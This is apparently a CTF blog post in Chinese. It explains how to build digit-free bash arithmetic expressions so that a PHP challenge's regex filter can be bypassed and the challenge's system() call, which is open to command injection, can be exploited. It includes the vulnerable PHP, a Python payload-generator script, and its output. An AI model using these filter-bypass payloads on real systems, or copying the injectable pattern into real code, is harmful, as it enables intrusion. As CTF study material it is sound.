关于linux中构造无符号数字

最新推荐文章于 2024-04-06 14:21:06 发布
最新推荐文章于 2024-04-06 14:21:06 发布
阅读量288 收藏 1
点赞数 1
文章标签: linux python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49434527/article/details/128050099
版权

在CTF中时常遇到过滤数字这种情况那么我们就可以采用构造无参数数字利用自反原理

例如一下例题

<?php

// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}

我们如何快速构造自己想要的数字呢?

直接上脚本

import os.path
def mult_times(str, m, n):
    front_len = m
    if front_len > len(str):
        front_len = len(str)
    front = str[:front_len]

    result = ''
    for i in range(n):
        result = result + front
    return result
# 构造参数
print("提示:$((${_}))=0,$((~$((${_}))))=-1")
print("请输入你要构造的数字")
n = int(input("构造的数字:"))
yuanshi=mult_times('$((~$(())))', 11, n+1)
fushu=mult_times('$((~$(())))', 11, n)
print("原始数据:",yuanshi)
q='~$(('
p='))'
print('第一次取反结果为:')
print(q+yuanshi+p)
FSQF=(q+fushu+p)
b='$((~$(('
c='))))'
ZX='echo'
end=(ZX+" "+b+yuanshi+c)
FSQF2=ZX+" "+q+fushu+p
print('最后构造正数结果为:')
print(end)
print('最后构造负数结果为:')
print(FSQF2)
# 结果写入
current_path = os.getcwd()
file_path = os.path.join(current_path, 'RCE.sh')
file_test = open(file_path, 'w+', encoding='utf-8')
file_test.write(end)
file_test.close()
current_path = os.getcwd()
file_path = os.path.join(current_path, 'RCE2.sh')
file_test = open(file_path, 'w+', encoding='utf-8')
file_test.write(FSQF2)
file_test.close()
# 进行判断
print("判断有效!输出正数数字为:")
os.system("chmod +x RCE.sh;bash RCE.sh")
print("判断有效!输出负数数字为:")
os.system("chmod +x RCE.sh;bash RCE2.sh")

运行结果如下

提示:$((${_}))=0,$((~$((${_}))))=-1
请输入你要构造的数字
构造的数字:66
原始数据: $((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))
第一次取反结果为:
~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))
最后构造正数结果为:
echo $((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
最后构造负数结果为:
echo ~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))
判断有效!输出正数数字为:
66
判断有效!输出负数数字为:
~-66

最后附上截图

 

Fright_Moch
关注
linuxvfs和fs区别,解析Linux的 VFS 文件系统机制(rootfs)一
weixin_29898529的博客
05-13 1038
本文阐述 Linux 的文件系统部分,源代码来自基于 IA32 的 2.4.20 内核。总体上说 Linux下的文件系统主要可分为三大块:一是上层的文件系统的系统调用,二是虚拟文件系统 VFS(Virtual FilesystemSwitch),三是挂载到 VFS 的各实际文件系统,例如 ext2,jffs 等。本文侧重于通过具体的代码分析来解释 Linux内核 VFS 的内在机制,在这过程...
关于linux的最新问题合集
lintao1999_csdn的博客
02-21 1129
关于linux的最新问题合集 关于linux的最新问题合集,有技术问题,上 bug200.com 如何实现malloc函数[保留] 任何人都能帮助我使用系统调用(如brk()和sbrk())实现malloc()、calloc()、realloc()库调用吗? 我不理解brk和sbrk的语法,你能解释一下吗 以及任何使用BRK和SBRK的小程序 #include&lt;stdio.h&gt; #...
linux有符号和无符号,有符号数和无符号
weixin_33595018的博客
05-15 161
该楼层疑似违规已被系统折叠隐藏此楼查看此楼学习了二进制数据,我们知道,在计算机系统,存储的任何数据都是以二进制数据的格式存储。存储数据的最小单位是字节(Byte),一个字节的容量是八位(bit),可以存储8个二进制数据。在讲解“有符号数”和“无符号数”之前,我们先来举一个例子。例如,有个人(称呼A)去爬山,半路上碰到朋友,朋友送了他一瓶水,此时A手上拥有一瓶水;那么,如果A觉得渴了,那他就把这...
linux按文内容长度分隔符,Linux – 按名称的一部分对文件进行排序(无分隔符)
weixin_33561009的博客
05-07 165
我想得到一个排序的文件列表.文件具有以下命名约定:DATENUMBER.txt(不含空格).例如,2015-12-09的文件3如下:201512093.txtls的版本排序选项对我没有帮助:ls -v:201512183.txt201512184.txt201512188.txt201512191.txt201512195.txt201512199.txt2015121810.txt2015121...
IIS6.0文件解析漏洞exp
Fright-Moch的博客
04-18 254
【代码】IIS6.0文件解析漏洞exp。
ctfshow命令执行(web29-web56)第一部分
qq_63928796的博客
10-05 1782
过滤了flag可以用*或者?绕过。
Nmap网络扫描器实验
Fright-Moch的博客
05-09 7309
网络入侵的一般流程是确定目标、信息收集、漏洞挖掘、实施攻击、留下后门、清除日志。在信息收集环节又可分为网络踩点、网络扫描和网络查点。在网络扫描部分,按照攻击者的入侵流程又可分为主机扫描、端口扫描、系统类型探测和漏洞扫描。 网络扫描是针对整个目标网络或单台主机,网络扫描可以全面、快速、准确的获取目标系统的信息;通过网络扫描发现对方,获取对方的信息是进行网络攻防的前提。至今,互联网上有许多开源的优秀网络扫描工具,Nmap(简称Network Mapper)就是世界上最流行功能、最强大的网络扫描工具。
LINUX】进程管理
最新发布
兜哥的博客
04-06 2444
进程是计算机系统最重要的概念之一,在计算机系统并行运行着大量的程序,这些程序不可能独占系统的全部资源,而是需要这些程序共享系统资源,所以这些程序在运行时会产生一定的竞争关系。那在这种情况下,系统资源怎么分配?运行程序该如何管理呢?操作系统为了解决这一系列的问题引入了进程的概念,用来作为操作系统分配和管理系统资源的基本单位。所以进程的出现是为了让系统资源的利用更加合理,从而提高系统的运行效率。定义进程,就避免不了提到另一个概念“程序”。
Linux 命令完全手册
pythonandaiot的博客
12-22 7036
这本《Linux 命令完全手册》将涵盖你作为开发者需要用到的 60 个核心 Bash 命令。每个命令都附有代码示例和用法提示。 这本手册遵循二八定律:你花两成的时间学习一个主题,便可获得其八成的知识。 我觉得这种方式能给你一个全面的概述。 这本手册并不试图涵盖所有关于 Linux 及其命令的内容,而是专注于那些你在大部分时间里都会用到的小型核心命令,同时试着简化更复杂命令的用法。 以下介绍的命令,在 Linux、macOS、WSL 和其他类 UNIX 环境均可使用。 我希望这本手册的内...
linux简介
wpf1391074638的博客
04-06 545
Linux 是一种自由和开放源码的类 UNIX 操作系统。 Linux 英文解释为 Linux is not Unix。 Linux 是在 1991 由林纳斯·托瓦兹在赫尔辛基大学上学时创立的,主要受到 Minix 和 Unix 思想的启发。 Linux 内核最初只是由芬兰人林纳斯·托瓦兹(Linus Torvalds)在赫尔辛基大学上学时出于个人爱好而编写的。 Linux 是一套免费使用和自由传播的类 Unix 操作系统,是一个基于 POSIX 和 UNIX 的多用户、多任务、支持多线程和多 CP
ctfshow web入门 命令执行2(52~77)(含总结)
m0_61448651的博客
01-16 1332
ctfshow web入门命令执行2(52~77)(含总结)
无字母命令执行
WHQ556677的博客
12-30 1224
先看一道题 <?php error_reporting(0); show_source(__FILE__); if (isset($_GET['a'])) { $c=$_GET['a']; if (!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)) { system($c); }else { echo "hacker!"; } } ?> 代码审计 过滤了字母
PHP正则表达式
黄啊码
03-26 647
验证邮箱格式 复制代码 // 验证邮箱格式 function checkEmail($email) { if (!preg_match("/([\w\-]+\@[\w\-]+\.[\w\-]+)/", $email)) { return false; } else { return true; } } 复制代码 验证 URL 复制代码 //...
命令执行各种姿势总结
weixin_48427966的博客
04-24 1497
一、绕过if(!eval($c);web30。
基于数据挖掘的入侵检测系统实验
Fright-Moch的博客
05-09 2558
数据挖掘算法可以挖掘隐藏于大数据的信息。入侵数据也具有大数据的特点,数据挖掘的许多方法可以应用于入侵检测,如聚类、分类、关联分析、序列分析方法。 “物以类聚,人与群分”即为聚类的通俗理解。聚类将数据按相似性的原则进行分类,分类后的类别称为簇;每个簇内有很大的相似性,而不同簇之间有很大的相异性。聚类是将物理或抽象对象的集合划分成多个类的过程,每一类都由相似的对象组成。聚类分析也是无监督学习的过程;与分类不同,在学习的过程不依赖于预先定义的类或带类标记的训练集,而是通过自身算法进行分
ctf php 字符串 过滤,ctfshow命令执行(50)与常见过滤的思考
weixin_39667041的博客
03-25 2623
源码:if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1")...
ctfshow命令执行之无数字字母
HoAd'blog
01-28 3602
命令执行-无数字字母getshell前言一、无字母命令执行二、无字母数字命令执行总结 前言 做ctfshow的时候,碰到命令执行的题,发现这两种类型的题很有趣,学到了很多知识。 前置知识: shell下可以利用.来执行任意脚本 Linux文件名支持用glob通配符代替 一、无字母命令执行 方法1 异或:在PHP,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们找到某两个非字母、数字的字符,他们的异或结果是这个字母即可。 方法2 取反:将汉字(%ff%ff%ff)的某个字符取出来,来进行取反
ctfshow WEB入门系列 之 命令执行1-10 (web29-39)
qq_43200143的博客
03-02 803
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } get传递参数c 执行命令。 c不能含有flag。 先ls一下看看有啥 ?c=system(ls); 直接上通配符解决吧 1.?c=syste...
正则表达式匹配域名、网址、url
Just Do It
01-28 7856
  DNS规定,域名的标号都由英文字母和数字组成,每一个标号不超过63个字符,也不区分大小写字母。标号除连字符(-)外不能使用其他的标点符号。级别最低的域名写在最左边,而级别最高的域名写在最右边。由多个标号组成的完整域名总共不超过255个字符。 由此匹配完整域名的正则表达式:    ^(?=^.{3,255}$)[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-z...
Linux shell脚本编程特殊符号与变量的使用
Linux 的特殊符号含义是指在 Linux 系统使用的特殊字符或符号,它们具有特定的含义和功能。这些特殊符号可以用来表示不同的操作、比较、逻辑运算、变量赋值等。 1. `exit` 语句 `exit` 语句用于退出当前 Shell...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值